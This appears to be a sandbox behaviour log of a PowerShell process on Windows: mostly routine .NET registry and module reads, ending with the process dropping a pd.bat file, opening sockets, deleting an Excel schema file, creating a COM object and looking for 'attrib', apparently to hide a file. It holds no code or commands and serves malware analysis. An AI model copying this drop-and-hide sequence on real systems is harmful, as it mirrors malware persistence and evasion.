00:05:235 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 Read NIDependencies

00:05:235 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36 Read Status

Registry
00:05:235 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36
00:05:235
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36
00:05:235
Read ILDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36
00:05:235
Read EvalationData

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36
00:05:235
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:235
Read System.Web.Services,2.0.0.0,,b03f5f7f11d50a3a,MSIL

00:05:250 File Operations, miscellaneous Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.INI

00:05:265 Files Read C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll

Registry
00:05:282 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Security__31bf3856ad364e35
Opened

Registry
00:05:282 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de
Opened

Registry
00:05:282 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
Opened

Registry
00:05:282 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
00:05:282
Read NIDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
00:05:282 Read ConfigMask

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f
00:05:282
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f
00:05:282
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f
00:05:282
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f
00:05:282
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f
00:05:282
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:282
Read Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
00:05:282
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
00:05:282
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
00:05:282
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
00:05:282
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
00:05:282
Read ILDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
00:05:282
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
00:05:282
Read EvalationData

00:05:296 Files Read C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll

00:05:296 File Operations, miscellaneous Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.INI

Registry
00:05:329 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.ConsoleHost.resources_en-US_31bf3856ad364e35
Opened

00:05:329 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.config

00:05:329 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2b1373f4\4f4f14cc Opened

00:05:343 Registry HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2969830022-2362906686-2146684197-500\Installer\Assemblies\C:|Windows|SysWOW64|WindowsPowerShell|v1.0|powershell.exe Opened

Registry
00:05:343 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2969830022-2362906686-2146684197-500\Installer\Assemblies\Global
Opened

Registry
00:05:343 HKCU\Software\Microsoft\Installer\Assemblies\C:|Windows|SysWOW64|WindowsPowerShell|v1.0|powershell.exe
Opened

Registry
00:05:343 HKCU\Software\Microsoft\Installer\Assemblies\Global
Opened

00:05:343 Registry HKLM\SOFTWARE\Classes\Installer\Assemblies\C:|Windows|SysWOW64|WindowsPowerShell|v1.0|powershell.exe Opened

Registry
00:05:343 HKLM\SOFTWARE\Classes\Installer\Assemblies\Global
Opened

00:05:657 Others Determined whether a specified security identifier (SID) is enabled in an access token

00:05:657 Files Read & Write CONOUT$ Opened Normal

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
00:05:718
Read NIDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
00:05:718
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
00:05:718
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
00:05:718
Read ILDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
00:05:718
Read EvalationData

Registry
00:05:718 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57
Opened

Registry
00:05:718 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
00:05:718
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
00:05:718
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
00:05:718
Read ConfigMask

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
00:05:735
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:735
Read System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
00:05:735
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
00:05:735
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
00:05:735
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
00:05:735
Read DisplayName

Registry
00:05:735 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data.SqlXml__b77a5c561934e089
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
00:05:735
Read Status

00:05:735 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84 Opened

Registry
00:05:750 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
Opened

Registry
00:05:750 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4
Opened

00:05:750 File Operations, miscellaneous Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
00:05:750
Read Status

00:05:750 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 Read NIDependencies

00:05:750 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
00:05:750
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
00:05:750
Read ILDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
00:05:750
Read EvalationData

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
00:05:750
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
00:05:750
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
00:05:750
Read ConfigMask

00:05:765 File Operations, miscellaneous Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.INI

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73
00:05:782
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73
00:05:782
Read NIDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73
00:05:782
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73
00:05:782
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73
00:05:782
Read ILDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73
00:05:782
Read ConfigMask

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73
00:05:782
Read ConfigString

Registry
00:05:782 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d
Opened

00:05:782 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73
00:05:782
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73
00:05:782
Read EvalationData

00:05:796 File Operations, miscellaneous Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.INI

Registry
00:05:860 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3e571dbb\41bddfc6
Opened

Registry
00:05:860 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.System.Management.Automation.resources_en-US_31bf3856ad364e35
Opened

00:05:890 Registry HKLM\System\CurrentControlSet\Control\Session Manager\Environment Read PSMODULEPATH

Registry
00:05:890 HKCU\Environment
Opened

Registry HKCU\Environment
00:05:890
Read PSMODULEPATH

Registry
00:05:890 HKLM\System\CurrentControlSet\Control\Session Manager\Environment
Opened

00:05:907 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml

00:05:907 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0

Registry
00:05:907 HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
Opened

Registry HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
00:05:907
Read path

00:05:907 Files Read C:\Users\Administrator\Documents

00:05:921 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml

00:05:938 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml Opened 8100000

00:05:968 Others Recorded system information

00:05:968 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml Opened 8100000

00:06:265 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml

00:06:265 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml

00:06:265 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml

00:06:265 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml

00:06:265 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml

00:06:265 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml

00:06:265 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml

00:06:265 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml

00:06:265 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml

00:06:296 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml Opened 8100000

00:06:329 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml Opened 8100000

00:06:343 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml Opened 8100000

00:06:360 Files Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll

00:06:375 Files Read C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll

00:06:375 Files Read C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.dll

00:06:375 Files Read C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll

00:06:375 Files Read C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll

00:06:407 Files Read C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll

00:06:407 Files Read C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll

00:06:407 Files Read C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.dll

00:06:438 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml Opened 8100000

00:06:468 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml Opened 8100000

00:06:485 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml Opened 8100000

00:06:843 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml Opened 8100000

00:06:890 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml Opened 8100000

00:06:907 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml Opened 8100000

Registry
00:06:954 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
Opened

Registry
00:06:968 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\a94d4ab\5a294d6
Opened

Registry HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
00:06:968
Read StackVersion

Registry
00:06:968 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Management.resources_en-US_31bf3856ad364e35
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\OSession
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\ODiag\PowerShell
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\ODiag
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Media Center
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
Opened

Registry
00:06:985 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell
Opened

00:07:000 Others Retrieved the user's logon name

Registry
00:07:000 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
Opened

Registry
00:07:000 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
Opened

Registry
00:07:000 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell
Opened

Registry
00:07:000 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\System
Opened

Registry
00:07:000 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell
Opened

Registry
00:07:000 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Security
Opened

Registry
00:07:000 HKLM\SYSTEM\CurrentControlSet\Services\EventLog\OSession\PowerShell
Opened

00:07:015 Registry HKCU\Control Panel\International Read sYearMonth

Registry
00:07:015 HKCU\Control Panel\International
Opened

00:07:093 Files Read C:\

00:07:093 Files Read C:\Users\Administrator

00:07:093 File Operations, miscellaneous Obtained information about the file system and volume associated with the root directory

00:07:093 File Operations, miscellaneous Obtained a bitmask representing the currently available disk drives

00:07:093 File Operations, miscellaneous Determined whether a disk drive C:\ is a removable, fixed, CD-ROM, RAM disk, or network drive

00:07:093 Files Read C:\.

Registry
00:07:157 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Security.resources_en-US_31bf3856ad364e35
Opened

Registry
00:07:157 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\20fe3c1a\56aa3966
Opened

00:07:171 File Operations, miscellaneous Obtained the current directory for the current process

00:07:235 Files Read C:\Users\.

00:07:235 Files Read C:\Users\Administrator\Documents\.

00:07:235 Files Read C:\Users

00:07:235 Files Read C:\Users\Administrator\.

Registry
00:07:375 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
Opened

Registry
00:07:375 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
00:07:375
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
00:07:375
Read ConfigMask

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
00:07:375
Read MVID

00:07:375 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82
00:07:390
Read SIG

Registry
00:07:390 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualC__b03f5f7f11d50a3a
Opened

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:07:390
Read Microsoft.VisualC,8.0.0.0,,b03f5f7f11d50a3a,MSIL

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82
00:07:390
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82
00:07:390
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82
00:07:390
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
00:07:390
Read EvalationData

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
00:07:390
Read ILDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
00:07:390
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
00:07:390
Read NIDependencies

Registry
00:07:390 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82
00:07:390
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
00:07:390
Read Status

00:07:407 File Operations, miscellaneous Searched a directory for the name: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.INI

00:07:407 Files Read C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll Opened Normal

00:07:546 Files Read C:\Users\Administrator\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

00:07:546 Files Read C:\Users\Administrator\Documents\WindowsPowerShell\profile.ps1

00:07:546 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1

00:07:546 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1

Registry
00:07:563 HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds
Opened

Registry HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds
00:07:579
Read PipelineMaxStackSizeMB

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
00:07:750
Read DisplayName

00:07:750 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 Read ConfigMask

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
00:07:750
Read ConfigString

Registry
00:07:750 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
Opened
00:07:750 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
Read EvalationData

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
00:07:750
Read ILDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
00:07:750
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
00:07:750
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
00:07:750
Read NIDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
00:07:750
Read Status

Registry
00:07:750 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8
Opened

00:07:765 Files Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config

C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config
Files Read
00:07:765
Opened 100000

File
00:07:765 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.INI
miscellaneous

00:07:765 Files Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\

00:07:765 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

00:07:782 Files Read pd.bat

00:07:782 Files Created C:\Users\Administrator\Documents\pd.bat (access: Write, attributes: 100000)

00:07:796 Registry Read HKLM\Software\Microsoft\Windows NT\CurrentVersion InstallationType

00:07:796 Registry Opened HKLM\Software\Microsoft\Windows NT\CurrentVersion

00:07:813 Socket Activities Initiated WS2_32 socket DLL

00:07:813 Socket Activities Closed the socket

00:07:829 Registry Opened HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance

00:07:829 Registry Opened HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance

00:07:829 Others Converted a string-format security descriptor into a valid, functional security descriptor

00:07:829 Signal Objects global\.net clr networking

00:07:829 Registry Read HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance FileMappingSize

00:07:829 Registry Read HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance First Counter

00:07:829 Registry Read HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance IsMultiInstance

00:07:829 Registry Read HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance Library

00:07:829 Registry Read HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance CategoryOptions

00:07:829 Registry Read HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance Counter Names

00:07:843 Registry Opened Retrieved a handle to the HKEY_CURRENT_USER key for the user the current thread is impersonating

00:07:843 Socket Activities Controlled the I/O mode of the newly created socket

00:07:860 Registry Opened HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections

00:07:860 Registry Opened HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

00:07:985 Files Deleted C:\Users\Administrator\AppData\Local\Microsoft\Schemas\MS Excel_restart.xml

00:08:015 Process Created {7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}

00:08:656 Files Read C:\ProgramData\Oracle\Java\javapath

00:08:671 File Operations (miscellaneous) Searched a directory for the name: C:\Windows\system32\attrib.ps1

00:08:671 File Operations (miscellaneous) Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.WSH

00:08:671 File Operations (miscellaneous) Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.ps1

00:08:671 File Operations (miscellaneous) Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.psd1

00:08:671 File Operations (miscellaneous) Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.psm1

00:08:671 File Operations (miscellaneous) Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib

00:08:671 File Operations (miscellaneous) Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.WSF

00:08:671 File Operations (miscellaneous) Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.VBS

00:08:671 File Operations (miscellaneous) Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.VBE

00:08:671 File Operations (miscellaneous) Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.MSC

00:08:671 File Operations (miscellaneous) Searched a directory for the name: C:\Windows\system32\attrib.COM

00:08:671 File Operations (miscellaneous) Searched a directory for the name: C:\Windows\system32\attrib.EXE

00:08:671 File Operations (miscellaneous) Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.JSE

